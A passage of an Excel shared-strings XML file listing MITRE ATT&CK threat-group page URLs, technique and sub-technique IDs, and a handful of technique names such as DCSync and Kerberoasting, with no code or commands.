    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0108</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0097</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0060</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0114</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0080</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0052</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0132</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0070</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0079</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0105</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0035</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0074</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0017</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0031</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0066</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0120</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0137</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0051</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0085</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0053</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0037</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0046</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0061</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0117</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0101</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0093</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0084</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0047</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0036</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0115</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0078</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0043</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0125</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0126</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0072</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0100</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0136</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0119</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0094</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0032</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0077</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0065</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0030</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0095</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0059</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0045</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0103</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0021</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0069</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0129</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0019</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0055</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0133</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0049</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0116</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0071</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0040</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0068</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0033</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0056</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0075</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0024</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0106</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0048</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0034</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0029</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0104</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0121</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0091</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0122</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0083</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0054</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0038</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0041</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0039</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0062</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0092</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0127</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0139</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0088</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0089</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0028</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0027</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0076</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0131</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0134</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0081</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0010</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0123</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0107</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0124</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0112</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0044</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0090</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0102</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0128</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>T1619</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>T1620</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>ROMMONkit</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Mavinject</t>
  </si>
  <si>
    <t>MMC</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>AS-REP Roasting</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t>T1548</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1548.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1548.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1548.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1548.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1134</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1134.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1134.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1134.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1134.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1134.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1087</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1087.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1087.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1087.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1087.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1098</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1098.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1098.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1098.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1098.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1583</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1583.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1583.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1583.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1583.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1583.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1583.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1595</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1595.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1595.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1557</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1557.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1557.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1071</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1071.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1071.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1071.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1071.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1560</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1560.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1560.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1560.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1020.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1547.015</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1037</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1037.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1037.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1037.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1037.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1037.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1110</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1110.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1110.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1110.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1110.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1059.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1586</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1586.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1586.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1584</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1584.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1584.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1584.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1584.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1584.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1584.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1136</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1136.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1136.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1136.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1543</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1543.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1543.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1543.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1543.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1555</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1555.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1555.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1555.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1555.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1555.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1132</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1132.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1132.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1602</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1602.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1602.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1213</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1213.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1213.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1213.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1565</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1565.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1565.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1565.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1001.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1001.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1001.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1074</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1074.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1074.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1491</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1491.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1491.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1587</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1587.001</t>
